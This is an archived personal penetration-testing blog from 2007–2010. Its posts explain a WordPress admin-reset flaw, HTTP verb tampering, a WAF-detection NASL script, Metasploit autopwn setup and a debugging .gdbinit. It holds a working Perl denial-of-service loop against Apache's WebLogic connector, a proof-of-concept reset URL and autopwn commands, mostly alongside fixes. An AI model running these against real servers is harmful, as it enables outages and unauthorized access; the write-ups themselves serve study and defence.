Information Intoxication

Moved Again!

2010-03-25T11:53:00.002-05:00

Just because I can't make up my mind. Blog has moved to http://infointox.net

WordPress <= 2.8.3 Admin Reset

2009-08-12T17:17:00.006-05:00

None of this is new its just me trying to understand it. This vulnerability only resets the admin password, which is then emailed to the admin. Someone could potentially DOS the admin with a small script to continually reset the password but overall this is just an annoyance. This is mainly due to a lack of input validation on the $key variable. How this seems to work is WordPress is using a black list method to check to see if the key is empty and it also has no checks to see if the key is empty before the query is ran.

Proof of Concept:
http://DOMAINNAME/wp-login.php?action=rp&key[]=

Why does it reset admin?

When $key is passed an array[] it is treated an empty string. This will in turn match every user within the database. The first user just happens to be the admin, which WordPress will reset.

$user = $wpdb->get_row(
$wpdb->prepare(
"SELECT * FROM $wpdb->users
WHERE user_activation_key = %s", $key
)
);

The Issue.
It looks like empty() will treat an array as an empty string and not return an error.

wp-login.php.
if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));

The Fix.
WordPress has released a fix which is shown below. This is still a black list approach and only adds an extra check for the array.

if ( empty( $key ) || is_array( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));

This is still using a black list method and I also think some improvements can be made before the query statement. I believe some blame can be put on PHP by not throwing an exception to an empty array. When time permits I would like to play around with other things that could be passed to $key. I'm still exploring other possibilities of this not just being a password reset that is sent to the admin. If anyone has some ideas, I would love to hear.

References:

http://core.trac.wordpress.org/changeset/11798
http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0114.html
http://us3.php.net/manual/en/function.empty.php
http://isc.sans.org/diary.html?storyid=6934

Metasploit Ubuntu Checklist

2009-07-05T10:55:00.004-05:00

So I just got a new computer and have been setting up my work environment. One thing I always forget is getting metasploit running with autopwn. I only seem to do this when I either get a new machine or rebuild, which is not that often. I feel like once you have autopwn going, metasploit is at a good point for exploiting and developing.

This post is going to be a quick reference list of getting the framwork up and going. At the time of this post it was Ubuntu 9.04 and Metasploit 3.2 .

1. Get Metasploit:
I always get metasploit through subversion. Do it anyway you like.

$sudo apt-get install subversion
$svn co http://metasploit.com/svn/framework3/trunk/

2. Install Ubuntu debs:
Add any others that you think are necessary.

$apt-get install ruby rubygems sqlite libsqlite3-ruby libopenssl-ruby nmap

3. Create Metasploit DB:
In the example below, mine was already created.

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /home/asdf/.msf3/sqlite3.db
msf > db_connect
[*] Successfully connected to the database
[*] File: /home/asdf/.msf3/sqlite3.db
msf >

4. Run autopwn:
This is all at the very basic level, just testing if it works.

msf > db_nmap 192.168.1.2
msf > db_autopwn -e -p -b
msf > sessions

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.1:60781 -> 192.168.1.2:15786

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Like I said this is all basic and just a quick checklist to get it going. I have never wrote this down because I always felt like I would remember. Anyways if anyone else has some stuff they add or do to get their base framework going, I would love to hear about it.

References:
http://metasploit.com/
http://en.wikibooks.org/wiki/Metasploit/UsingMetasploit

URL Change

2009-02-14T11:19:00.002-06:00

Well I don't know why but I decided to drop kpan1c.blogspot.com in favor of informationintoxication.blogspot.com. My guess is I will change it again. Sorry for any of the confusion, I need to just buy a domain for this...

WAF Checker

2008-08-08T18:30:00.000-05:00

During a large application assessment, I noticed in a cookie that it was load balanced. I gathered as many unique cookies I could and noticed the application was spread across many web servers. This allows room for errors concerning a WAF. Why not attack a server that the WAF is not protecting?

On this note I wrote a quick little NASL script to find a server that is not protected by the WAF. The only trick to this script is understanding what response you get once the WAF is triggered. Every WAF I have worked with all block the User Agent "nikto" by default. To find the response it gives I just set my User Agent to "nikto" and make a standard GET request. If this doesn't work you can call your basic XSS stuff and it will usually trigger the WAF.

Once you can get the WAF triggered you just have to find something different in the response for the script to look for. In my case it was just "error". Now just run the script and see if any WAF's are down.

#Create tcp socket to webserver port
socket_timeout = 5;
soc = open_sock_tcp(80);

#grab host ip of current box with socket open
hostip=get_host_ip();

#if socket was created
if (soc) {

#create string and send
str = string("GET /index.html HTTP/1.0\r\nUser-Agent:Nikto\r\n\r\n");
send(socket:soc, data:str);

#grab data from the socket
page = recv(socket:soc, length:4096);

#grep for the line with error or whatever waf refturns
error = egrep(pattern:"error*", string : page);

#if grep returns value
if(error){
display("WAF ON ",hostip,"\n");
}
else{
display("WAF OFF ",hostip,"\n");
}

#close socket
close(soc);
}

I found this script pretty handy for pen-testing and monitoring.

On the monitoring side you can just throw it in a cron job and have it email you if any WAF's were found to be off.

On the pen-testing side its a lot easier attacking an app with out those pesky WAF's

BEA Weblogic Apache Connector Remote Buffer Overflow

2008-07-31T18:00:00.001-05:00

This post was delayed in release due to sensitivity.

This vulnerability was a pretty fun one just because it affected so many people and it was just so simple to do.

This vulnerability is your standard stack based overflow. This particular overflow occurs in mod_wl which is a WebLogic connector for Apache. The overflow occurs when you send a long POST request for a .jsp. I started to look at KingCopes code but it just didn't seem to work in my environment. So based off his code for the DOS, I wrote the one below to test with, nothing fancy.


use IO::Socket;
use strict;


my $port = $ARGV[1];
my $host = $ARGV[0];

my $dos=0;

while(1) {

 if ($dos eq 1) {
  "Server is down\n";
          exit;
 }

 $a = "A" x 8000;
 my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                         PeerPort => $port,
                                         Proto => 'tcp');
 print $sock "POST /index.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
 
 read($sock,$_,100); 
 print "=>" . $_ . "<=\n\n";
        if (!($_ =~ /Server/)) {
                        $dos = 1;
                }
 close($sock);        
}

The code above will seg fault Apache. The endless loop is needed because Apache recovers so quickly and it was an easy way to perform the DOS(took a couple of minutes). I have not had much time but I would like to explore this further and start debugging to see if code can be executed in a Linux environment.

Fix:
After all of my testing the workaround that was recommended by Oracle does work. They have not released a patch at this time.

With the workaround in place I even tried the DOS by sending a POST of 3999 to not trigger the LimitRequestLine. Apache handled the large repeating requests like a champ.

Workaround in apache conf:
LimitRequestLine 4000

http://www.milw0rm.com
http://cve.mitre.org
http://www.frsirt.com

HTTP Verb Tampering

2008-06-06T11:03:00.005-05:00

While this is really nothing that new, it has recently resurfaced with some interesting uses. Aspect Security has published a white paper "Bypassing Web Authentication and Authorization with HTTP Verb Tampering" that has brought this all to light.

In the past, I would usually use verb tampering for your XSS or SQLi attacks. Authorization bypass really never crossed my mind, this prompted me read up a bit. After some reading, It was kind of a "hit my head" type of moment. I highly recommend reading the white paper but here is a high level overview as I see it.

Verb Tampering for authorization bypass can be as simple as substituting a GET with a HEAD. For example:

In Java EE you can restrict access to a location with web.xml.


<security-constraint>
   <web-resource-collection>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
   </web-resource-collection>
   <auth-constraint>
      <role-name>admin</role-name>
   </auth-constraint>
 </security-constraint>

This restricts access to /admin and the listed http-methods. The thing that is not mentioned if you actually change the verb to something different such as HEAD, it will actually allow you access. You can easily do this with Webscarab by intercepting the request.

Many people think by explicitly stating what methods to block that it won't allow the others , when in fact if they did not state any methods it would block all. The methods that are listed are the only ones that are protected. Funny side note: I was actually looking at BEA docs for something totally unrelated and I happen to see their recommendation on how to secure folders with web.xml, and their way was vulnerable to the HEAD attack.

Another interesting find is the use of arbitrary verbs. In php and java this is allowed which means that we can throw it a verb that does not even exist. The application will then take the request and then convert it to a GET. This also bypasses the security restrictions.

More Reading:
http://jeremiahgrossman.blogspot.com/2008/06/what-you-need-to-know-about-http-verb.html
http://www.webappsec.org/lists/websecurity/archive/2008-06/msg00022.html
http://www.webappsec.org/lists/websecurity/archive/2008-05/msg00072.html
http://www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
http://www.securitycompass.com/exploit_me/accessme/accessme-0.1.shtml
http://www.aspectsecurity.com/documents/Aspect_VBAAC_Bypass.swf

.gdbinit The Security Way

2008-05-16T10:15:00.006-05:00

I have worked quite a bit with gdb and have become pretty familiar with the common commands. gdb is a great debugger for * nix systems, but it can become a bit overwhelming with all the different commands. To make this a bit easier and more security friendly we can use ~.gdbinit. Within .gdbinit you can define alias and macros to aid in displaying and use of gdb.

With a good gdbinit file, life will be a bit more pleasent when searching for that next vulnerbility and/or reversing that next file.

Lets start with creating an alias.

define bpl
 info breakpoints
end

Here is another one that save your fingers from typing info all the time.

define stack
 info stack
 info frame
 info args
 info locals
end

None of this is anything new, but in all my readings I have just recently learned about it.  So I figured posting something may help out. I always knew there was a way to create macros in gdb, it just never dawned on me to look in .gdbinit !

To make life simple and if you don't want to write your own, below is a nice cracker-friendly .gdbinit file I found.

# INSTRUCTIONS: save as ~/.gdbinit
#
# DESCRIPTION: A cracker-friendly gdb configuration file.
#
# REVISION : 6.1
#
# CONTRIBUTORS: mammon_, elaine, pusillus, mong
#
# FEEDBACK: http://board.anticrack.de/viewforum.php?f=35
#
# NOTES: 'help user' in gdb will list the commands/descriptions in this file
# 'context on' now enables auto-display of context screen
#
# CHANGELOG:
# Version 6.1
# fixed filename in step_to_call so it points to /dev/null
# changed location of logfiles from /tmp to ~
# Version 6j
# added print_insn_type, get_insn_type, context-on, context-off commands
# added trace_calls, trace_run, step_to_call commands
# changed hook-stop so it checks $SHOW_CONTEXT variable
# Version 5
# added bpm, dump_bin, dump_hex, bp_alloc commands
# added 'assemble' by elaine, 'gas_asm' by mong
# added Tip Topics for aspiring crackers ;)
# Version 4
# added eflags-changing insns by pusillus
# added bp, nop, null, and int3 patch commands, also hook-stop
# Version 3
# incorporated elaine's if/else goodness into the hex/ascii dump
# Version 2
# radix bugfix by elaine
# TODO:
# * add global vars to allow user to control stack,data,code win sizes
# * add dump, append, set write, etc commands
# * more tips!

# ______________breakpoint aliases_____________
define bpl
info breakpoints
end
document bpl
List breakpoints
end

define bp
set $SHOW_CONTEXT = 1
break * $arg0
end
document bp
Set a breakpoint on address
Usage: bp addr
end

define bpc
clear $arg0
end
document bpc
Clear breakpoint at function/address
Usage: bpc addr
end

define bpe
enable $arg0
end
document bpe
Enable breakpoint #
Usage: bpe num
end

define bpd
disable $arg0
end
document bpd
Disable breakpoint #
Usage: bpd num
end

define bpt
set $SHOW_CONTEXT = 1
tbreak $arg0
end
document bpt
Set a temporary breakpoint on address
Usage: bpt addr
end

define bpm
set $SHOW_CONTEXT = 1
awatch $arg0
end
document bpm
Set a read/write breakpoint on address
Usage: bpm addr
end

define bhb
set $SHOW_CONTEXT = 1
hb * $arg0
end
document bhb
Set Hardware Assisted breakpoint on address
Usage: bhb addr
end

# ______________process information____________
define argv
show args
end
document argv
Print program arguments
end

define stack
info stack
end
document stack
Print call stack
end

define frame
info frame
info args
info locals
end
document frame
Print stack frame
end

define flags
if (($eflags >> 0xB) & 1 )
printf "O "
else
printf "o "
end
if (($eflags >> 0xA) & 1 )
printf "D "
else
printf "d "
end
if (($eflags >> 9) & 1 )
printf "I "
else
printf "i "
end
if (($eflags >> 8) & 1 )
printf "T "
else
printf "t "
end
if (($eflags >> 7) & 1 )
printf "S "
else
printf "s "
end
if (($eflags >> 6) & 1 )
printf "Z "
else
printf "z "
end
if (($eflags >> 4) & 1 )
printf "A "
else
printf "a "
end
if (($eflags >> 2) & 1 )
printf "P "
else
printf "p "
end
if ($eflags & 1)
printf "C "
else
printf "c "
end
printf "\n"
end
document flags
Print flags register
end

define eflags
printf " OF <%d> DF <%d> IF <%d> TF <%d>",\
(($eflags >> 0xB) & 1 ), (($eflags >> 0xA) & 1 ), \
(($eflags >> 9) & 1 ), (($eflags >> 8) & 1 )
printf " SF <%d> ZF <%d> AF <%d> PF <%d> CF <%d>\n",\
(($eflags >> 7) & 1 ), (($eflags >> 6) & 1 ),\
(($eflags >> 4) & 1 ), (($eflags >> 2) & 1 ), ($eflags & 1)
printf " ID <%d> VIP <%d> VIF <%d> AC <%d>",\
(($eflags >> 0x15) & 1 ), (($eflags >> 0x14) & 1 ), \
(($eflags >> 0x13) & 1 ), (($eflags >> 0x12) & 1 )
printf " VM <%d> RF <%d> NT <%d> IOPL <%d>\n",\
(($eflags >> 0x11) & 1 ), (($eflags >> 0x10) & 1 ),\
(($eflags >> 0xE) & 1 ), (($eflags >> 0xC) & 3 )
end
document eflags
Print entire eflags register
end

define reg
printf " eax:%08X ebx:%08X ecx:%08X ", $eax, $ebx, $ecx
printf " edx:%08X eflags:%08X\n", $edx, $eflags
printf " esi:%08X edi:%08X esp:%08X ", $esi, $edi, $esp
printf " ebp:%08X eip:%08X\n", $ebp, $eip
printf " cs:%04X ds:%04X es:%04X", $cs, $ds, $es
printf " fs:%04X gs:%04X ss:%04X ", $fs, $gs, $ss
echo \033[31m
flags
echo \033[0m
end
document reg
Print CPU registers
end

define func
info functions
end
document func
Print functions in target
end

define var
info variables
end
document var
Print variables (symbols) in target
end

define lib
info sharedlibrary
end
document lib
Print shared libraries linked to target
end

define sig
info signals
end
document sig
Print signal actions for target
end

define thread
info threads
end
document thread
Print threads in target
end

define u
info udot
end
document u
Print kernel 'user' struct for target
end

define dis
disassemble $arg0
end
document dis
Disassemble address
Usage: dis addr
end

# ________________hex/ascii dump an address______________
define ascii_char
# thanks elaine :)
set $_c=*(unsigned char *)($arg0)
if ( $_c <> 0x7E )
printf "."
else
printf "%c", $_c
end
end
document ascii_char
Print the ASCII value of arg0 or '.' if value is unprintable
end

define hex_quad
printf "%02X %02X %02X %02X %02X %02X %02X %02X", \
*(unsigned char*)($arg0), *(unsigned char*)($arg0 + 1), \
*(unsigned char*)($arg0 + 2), *(unsigned char*)($arg0 + 3), \
*(unsigned char*)($arg0 + 4), *(unsigned char*)($arg0 + 5), \
*(unsigned char*)($arg0 + 6), *(unsigned char*)($arg0 + 7)
end
document hex_quad
Print eight hexadecimal bytes starting at arg0
end

define hexdump
printf "%08X : ", $arg0
hex_quad $arg0
printf " - "
hex_quad ($arg0+8)
printf " "

ascii_char ($arg0)
ascii_char ($arg0+1)
ascii_char ($arg0+2)
ascii_char ($arg0+3)
ascii_char ($arg0+4)
ascii_char ($arg0+5)
ascii_char ($arg0+6)
ascii_char ($arg0+7)
ascii_char ($arg0+8)
ascii_char ($arg0+9)
ascii_char ($arg0+0xA)
ascii_char ($arg0+0xB)
ascii_char ($arg0+0xC)
ascii_char ($arg0+0xD)
ascii_char ($arg0+0xE)
ascii_char ($arg0+0xF)

printf "\n"
end
document hexdump
Display a 16-byte hex/ASCII dump of arg0
end

# ________________data window__________________
define ddump
echo \033[36m

printf "[%04X:%08X]------------------------", $ds, $data_addr
printf "---------------------------------[ data]\n"
echo \033[34m
set $_count=0
while ( $_count < $arg0 ) set $_i=($_count*0x10) hexdump ($data_addr+$_i) set $_count++ end end document ddump Display $arg0 lines of hexdump for address $data_addr end define dd if ( ($arg0 & 0x40000000) || ($arg0 & 0x08000000) || ($arg0 & 0xBF000000) ) set $data_addr=$arg0 ddump 0x10 else printf "Invalid address: %08X\n", $arg0 end end document dd Display 16 lines of a hex dump for $arg0 end define datawin if ( ($esi & 0x40000000) || ($esi & 0x08000000) || ($esi & 0xBF000000) ) set $data_addr=$esi else if ( ($edi & 0x40000000) || ($edi & 0x08000000) || ($edi & 0xBF000000) ) set $data_addr=$edi else if ( ($eax & 0x40000000) || ($eax & 0x08000000) || \ ($eax & 0xBF000000) ) set $data_addr=$eax else set $data_addr=$esp end end end ddump 2 end document datawin Display esi, edi, eax, or esp in data window end # ________________process context______________ define context echo \033[36m printf "----------------------------------------" printf "---------------------------------[ regs]\n" echo \033[32m reg echo \033[36m printf "[%04X:%08X]------------------------", $ss, $esp printf "---------------------------------[stack]\n" echo \033[34m hexdump $sp+0x30 hexdump $sp+0x20 hexdump $sp+0x10 hexdump $sp datawin echo \033[36m printf "[%04X:%08X]------------------------", $cs, $eip printf "---------------------------------[ code]\n" echo \033[37m x /6i $pc echo \033[36m printf "---------------------------------------" printf "----------------------------------------\n" echo \033[0m end document context Print regs, stack, ds:esi, and disassemble cs:eip end define context-on set $SHOW_CONTEXT = 1 end document context-on Enable display of context on every program stop end define context-off set $SHOW_CONTEXT = 1 end document context-on Disable display of context on every program stop end # ________________process control______________ define n ni end document n Step one instruction end define go stepi $arg0 end document go Step # instructions end define pret finish end document pret Step out of current call end define init set $SHOW_CONTEXT = 1 set $SHOW_NEST_INSN=0 tbreak _init r end document init Run program; break on _init() end define start set $SHOW_CONTEXT = 1 set $SHOW_NEST_INSN=0 tbreak _start r end document start Run program; break on _start() end define sstart set $SHOW_CONTEXT = 1 set $SHOW_NEST_INSN=0 tbreak __libc_start_main r end document sstart Run program; break on __libc_start_main(). Useful for stripped executables. end define main set $SHOW_CONTEXT = 1 set $SHOW_NEST_INSN=0 tbreak main r end document main Run program; break on main() end # ________________eflags commands_______________ define cfc if ($eflags & 1) set $eflags = $eflags&~1 else set $eflags = $eflags|1 end end document cfc change Carry Flag end define cfp if (($eflags >> 2) & 1 )
set $eflags = $eflags&~0x4
else
set $eflags = $eflags|0x4
end
end
document cfp
change Carry Flag
end

define cfa
if (($eflags >> 4) & 1 )
set $eflags = $eflags&~0x10
else
set $eflags = $eflags|0x10
end
end
document cfa
change Auxiliary Carry Flag
end

define cfz
if (($eflags >> 6) & 1 )
set $eflags = $eflags&~0x40
else
set $eflags = $eflags|0x40
end
end
document cfz
change Zero Flag
end

define cfs
if (($eflags >> 7) & 1 )
set $eflags = $eflags&~0x80
else
set $eflags = $eflags|0x80
end
end
document cfs
change Sign Flag
end

define cft
if (($eflags >>8) & 1 )
set $eflags = $eflags&100
else
set $eflags = $eflags|100
end
end
document cft
change Trap Flag
end

define cfi
if (($eflags >> 9) & 1 )
set $eflags = $eflags&~0x200
else
set $eflags = $eflags|0x200
end
end
document cfi
change Interrupt Flag
end

define cfd
if (($eflags >>0xA ) & 1 )
set $eflags = $eflags&~0x400
else
set $eflags = $eflags|0x400
end
end
document cfd
change Direction Flag
end

define cfo
if (($eflags >> 0xB) & 1 )
set $eflags = $eflags&~0x800
else
set $eflags = $eflags|0x800
end
end
document cfo
change Overflow Flag
end

# --------------------patch---------------------
define nop
set * (unsigned char *) $arg0 = 0x90
end
document nop
Patch byte at address arg0 to a NOP insn
Usage: nop addr
end

define null
set * (unsigned char *) $arg0 = 0
end
document null
Patch byte at address arg0 to NULL
Usage: null addr
end

define int3
set * (unsigned char *) $arg0 = 0xCC
end
document int3
Patch byte at address arg0 to an INT3 insn
Usage: int3 addr
end

# --------------------cflow---------------------
define print_insn_type
if ($arg0 == 0)
printf "UNKNOWN";
end
if ($arg0 == 1)
printf "JMP";
end
if ($arg0 == 2)
printf "JCC";
end
if ($arg0 == 3)
printf "CALL";
end
if ($arg0 == 4)
printf "RET";
end
if ($arg0 == 5)
printf "INT";
end
end
document print_insn_type
This prints the human-readable mnemonic for the instruction typed passed as
a parameter (usually $INSN_TYPE).
end

define get_insn_type
set $INSN_TYPE = 0
set $_byte1=*(unsigned char *)$arg0
if ($_byte1 == 0x9A || $_byte1 == 0xE8 )
# "call"
set $INSN_TYPE=3
end
if ($_byte1 >= 0xE9 && $_byte1 <= 0xEB) # "jmp" set $INSN_TYPE=1 end if ($_byte1 >= 0x70 && $_byte1 <= 0x7F) # "jcc" set $INSN_TYPE=2 end if ($_byte1 >= 0xE0 && $_byte1 <= 0xE3 ) # "jcc" set $INSN_TYPE=2 end if ($_byte1 == 0xC2 || $_byte1 == 0xC3 || $_byte1 == 0xCA || $_byte1 == 0xCB || $_byte1 == 0xCF) # "ret" set $INSN_TYPE=4 end if ($_byte1 >= 0xCC && $_byte1 <= 0xCE) # "int" set $INSN_TYPE=5 end if ($_byte1 == 0x0F ) # two-byte opcode set $_byte2=*(unsigned char *)($arg0 +1) if ($_byte2 >= 0x80 && $_byte2 <= 0x8F) # "jcc" set $INSN_TYPE=2 end end if ($_byte1 == 0xFF ) # opcode extension set $_byte2=*(unsigned char *)($arg0 +1) set $_opext=($_byte2 & 0x38) if ($_opext == 0x10 || $_opext == 0x18) # "call" set $INSN_TYPE=3 end if ($_opext == 0x20 || $_opext == 0x28) # "jmp" set $INSN_TYPE=1 end end end document get_insn_type This takes an address as a parameter and sets the global $INSN_TYPE variable to 0, 1, 2, 3, 4, 5 if the instruction at the address is unknown, a jump, a conditional jump, a call, a return, or an interrupt. end define step_to_call set $_saved_ctx = $SHOW_CONTEXT set $SHOW_CONTEXT = 0 set $SHOW_NEST_INSN=0 set logging file /dev/null set logging on set logging redirect on set $_cont = 1 while ( $_cont > 0 )
stepi
get_insn_type $pc
if ($INSN_TYPE == 3)
set $_cont = 0
end
end

if ( $_saved_ctx > 0 )
context
else
x /i $pc
end

set $SHOW_CONTEXT = 1
set $SHOW_NEST_INSN=0
set logging redirect off
set logging off
set logging file gdb.txt
end
document step_to_call
This single steps until it encounters a call instruction; it stops before
the call is taken.
end

define trace_calls
set $SHOW_CONTEXT = 0
set $SHOW_NEST_INSN=0
set $_nest = 1
set listsize 0
set logging overwrite on
set logging file ~/gdb_trace_calls.txt
set logging on
set logging redirect on

while ( $_nest > 0 )
get_insn_type $pc

# handle nesting
if ($INSN_TYPE == 3)
set $_nest = $_nest + 1
else
if ($INSN_TYPE == 4)
set $_nest = $_nest - 1
end
end

# if a call, print it
if ($INSN_TYPE == 3)
set $x = $_nest
while ( $x > 0 )
printf "\t"
set $x = $x - 1
end
x /i $pc
end

#set logging file /dev/null
stepi
#set logging file ~/gdb_trace_calls.txt
end

set $SHOW_CONTEXT = 1
set $SHOW_NEST_INSN=0
set logging redirect off
set logging off
set logging file gdb.txt

# clean up trace file
shell grep -v ' at ' ~/gdb_trace_calls.txt > ~/gdb_trace_calls.1
shell grep -v ' in ' ~/gdb_trace_calls.1 > ~/gdb_trace_calls.txt
end
document trace_calls
Creates a runtime trace of the calls made target in ~/gdb_trace_calls.txt.
Note that this is very slow because gdb "set redirect on" does not work!
end

define trace_run
set $SHOW_CONTEXT = 0
set $SHOW_NEST_INSN=1
set logging overwrite on
set logging file ~/gdb_trace_run.txt
set logging on
set logging redirect on
set $_nest = 1

while ( $_nest > 0 )

get_insn_type $pc
# jmp, jcc, or cll
if ($INSN_TYPE == 3)
set $_nest = $_nest + 1
else
# ret
if ($INSN_TYPE == 4)
set $_nest = $_nest - 1
end
end

stepi
end

set $SHOW_CONTEXT = 1
set $SHOW_NEST_INSN=0
set logging file gdb.txt
set logging redirect off
set logging off

# clean up trace file
shell grep -v ' at ' ~/gdb_trace_run.txt > ~/gdb_trace_run.1
shell grep -v ' in ' ~/gdb_trace_run.1 > ~/gdb_trace_run.txt

end
document trace_run
Creates a runtime trace of the target in ~/gdb_trace_run.txt. Note
that this is very slow because gdb "set redirect on" does not work!
end

# _____________________misc_____________________
# this makes 'context' be called at every BP/step
define hook-stop
if ( $SHOW_CONTEXT > 0 )
context
end
if ( $SHOW_NEST_INSN > 0 )
set $x = $_nest
while ($x > 0 )
printf "\t"
set $x = $x - 1
end
end
end

define assemble
printf "Hit Ctrl-D to start, type code to assemble, hit Ctrl-D when done.\n"
printf "It is recommended to start with\n"
printf "\tBITS 32\n"
printf "Note that this command uses NASM (Intel syntax) to assemble.\n"
shell nasm -f bin -o /dev/stdout /dev/stdin | od -v -t x1 -w16 -A n
end
document assemble
Assemble Intel x86 instructions to binary opcodes. Uses nasm.
Usage: assemble
end

define gas_asm
printf "Type code to assemble, hit Ctrl-D until results appear :)\n"
printf "Note that this command uses GAS (AT&T syntax) to assemble.\n"
shell as -o ~/__gdb_tmp.bin
shell objdump -d -j .text --adjust-vma=$arg0 ~/__gdb_tmp.bin
shell rm ~/__gdb_tmp.bin
end
document gas_asm
Assemble Intel x86 instructions to binary opcodes using gas and objdump
Usage: gas_asm address
end

# !scary bp_alloc macro!
# The idea behind this macro is to break on the following code:
# 0x4008e0aa : sub $0xc,%esp
# 0x4008e0ad : call 0x4008e0b2
# 0x4008e0b2 : pop %ebx
# 0x4008e0b3 : add $0xa3f6e,%ebx
# At 0x4008e0b3, %ebx contains the address that has just been allocated
# The bp_alloc macro generates this breakpoint and *should* work for
# the forseeable future ... but if it breaks, set a breakpoint on
# __libc_malloc and look for where where the return value gets popped.

define bp_alloc
tbreak *(*__libc_malloc + F) if $ebx == $arg0
end
document bp_alloc
This sets a temporary breakpoint on the allocation of $arg0.
It works by setting a breakpoint on a specific address in __libc_malloc().
USE WITH CAUTION -- it is extremely platform dependent.
Usage: bp_alloc addr
end

define dump_hexfile
dump ihex memory $arg0 $arg1 $arg2
end
document dump_hexfile
Write a range of memory to a file in Intel ihex (hexdump) format.
Usage: dump_hexfile filename start_addr end_addr
end

define dump_binfile
dump memory $arg0 $arg1 $arg2
end
document dump_binfile
Write a range of memory to a binary file.
Usage: dump_binfile filename start_addr end_addr
end

# _________________cracker tips_________________
# The 'tips' command is used to provide tutorial-like info to the user
define tips
printf "Tip Topic Commands:\n"
printf "\ttip_display : Automatically display values on each break\n"
printf "\ttip_patch : Patching binaries\n"
printf "\ttip_strip : Dealing with stripped binaries\n"
printf "\ttip_syntax : ATT vs Intel syntax\n"
end
document tips
Provide a list of tips from crackers on various topics.
end

define tip_patch
printf "\n"
printf " PATCHING MEMORY\n"
printf "Any address can be patched using the 'set' command:\n"
printf "\t`set ADDR = VALUE` \te.g. `set *0x8049D6E = 0x90`\n"
printf "\n"
printf " PATCHING BINARY FILES\n"
printf "Use `set write` in order to patch the target executable\n"
printf "directly, instead of just patching memory.\n"
printf "\t`set write on` \t`set write off`\n"
printf "Note that this means any patches to the code or data segments\n"
printf "will be written to the executable file. When either of these\n"
printf "commands has been issued, the file must be reloaded.\n"
printf "\n"
end
document tip_patch
Tips on patching memory and binary files
end

define tip_strip
printf "\n"
printf " STOPPING BINARIES AT ENTRY POINT\n"
printf "Stripped binaries have no symbols, and are therefore tough to\n"
printf "start automatically. To debug a stripped binary, use\n"
printf "\tinfo file\n"
printf "to get the entry point of the file. The first few lines of\n"
printf "output will look like this:\n"
printf "\tSymbols from '/tmp/a.out'\n"
printf "\tLocal exec file:\n"
printf "\t `/tmp/a.out', file type elf32-i386.\n"
printf "\t Entry point: 0x80482e0\n"
printf "Use this entry point to set an entry point:\n"
printf "\t`tbreak *0x80482e0`\n"
printf "The breakpoint will delete itself after the program stops as\n"
printf "the entry point.\n"
printf "\n"
end
document tip_strip
Tips on dealing with stripped binaries
end

define tip_syntax
printf "\n"
printf "\t INTEL SYNTAX AT&T SYNTAX\n"
printf "\tmnemonic dest, src, imm mnemonic src, dest, imm\n"
printf "\t[base+index*scale+disp] disp(base, index, scale)\n"
printf "\tregister: eax register: %%eax\n"
printf "\timmediate: 0xFF immediate: $0xFF\n"
printf "\tdereference: [addr] dereference: addr(,1)\n"
printf "\tabsolute addr: addr absolute addr: *addr\n"
printf "\tbyte insn: mov byte ptr byte insn: movb\n"
printf "\tword insn: mov word ptr word insn: movw\n"
printf "\tdword insn: mov dword ptr dword insn: movd\n"
printf "\tfar call: call far far call: lcall\n"
printf "\tfar jump: jmp far far jump: ljmp\n"
printf "\n"
printf "Note that order of operands in reversed, and that AT&T syntax\n"
printf "requires that all instructions referencing memory operands \n"
printf "use an operand size suffix (b, w, d, q).\n"
printf "\n"
end
document tip_syntax
Summary of Intel and AT&T syntax differences
end

define tip_display
printf "\n"
printf "Any expression can be set to automatically be displayed every time\n"
printf "the target stops. The commands for this are:\n"
printf "\t`display expr' : automatically display expression 'expr'\n"
printf "\t`display' : show all displayed expressions\n"
printf "\t`undisplay num' : turn off autodisplay for expression # 'num'\n"
printf "Examples:\n"
printf "\t`display/x *(int *)$esp` : print top of stack\n"
printf "\t`display/x *(int *)($ebp+8)` : print first parameter\n"
printf "\t`display (char *)$esi` : print source string\n"
printf "\t`display (char *)$edi` : print destination string\n"
printf "\n"
end
document tip_display
Tips on automatically displaying values when a program stops.
end
# __________________gdb options_________________
set confirm off
set verbose off
#set prompt \033[01;m\033] niel@gdb $ \033[0m
set prompt \033[31mgdb $ \033[0m
set output-radix 0x10
set input-radix 0x10
# These make gdb never pause in its output
set height 0
set width 0
# why do these not work???
set $SHOW_CONTEXT = 1
set $SHOW_NEST_INSN=0

set disassembly-flavor intel

#EOF

CEPT Redux

2008-04-25T12:49:00.006-05:00

I have been meaning to post about this for some time now, but just have never had a chance. A while back I received Certified Expert Penetration Tester(CEPT) from IACRB.

Now I'm not a huge fan of taking tests, but this Cert worked well for me. It started with a normal multiple choice test, basic penetration stuff. If you pass that then they send you the fun. I have to say I never had so much fun taking a test.

Below is qouted from IACRB

Challenge #1: Discover and create a working exploit for Microsoft Windows Vulnerability.
Challenge #2: Discover and create a working exploit for Linux Vulnerability.
Challenge #3: Reverse engineer a Windows Binary.

Once you finish all three challenges you send it in, they review the sploits, and send you the cert.

While this is not a huge name cert yet, I believe it does hold some merit. It shows the person didn't just memorize a book and can put to practice what they know. I would recommend taking this if anyone is debating it.

http://www.iacertification.org/cept_certified_expert_penetration_tester.html
http://www.ethicalhacker.net/content/view/173/2/

Defcon 15

2007-08-08T17:02:00.002-05:00

Well just got back from Defcon 15. I will start highlighting on some topics I will be covering but for now I will just post pictures. Didn't really take many.

Defcon 15

Blogger Move

2007-07-11T10:44:00.000-05:00

Moved from Live Journal http://kpan1c.livejournal.com to http://kpan1c.blogspot.com . Blogger had some features I wanted to use so I figured I would give it a shot. I will not kill the live journal account just yet. Also, I am not renewing the kpan1c.org domain since I basically only used it as a redirect.

Using PEX Lib

2007-03-06T19:50:00.001-06:00

The metasploit framework has a handy little perl lib to aid you in finding your offset. There is nothing really fancy about it and many may already know about it. I figured for those who don't, its useful enough to highlight. I did use this in my stack overflow example.

At a very basic level lets say you got a seg fault by inserting 24 characters for input. With the Pex lib you can create a string 24 characters long all of unique dwords.

To create our pattern of 24 charcters we use pex like so.
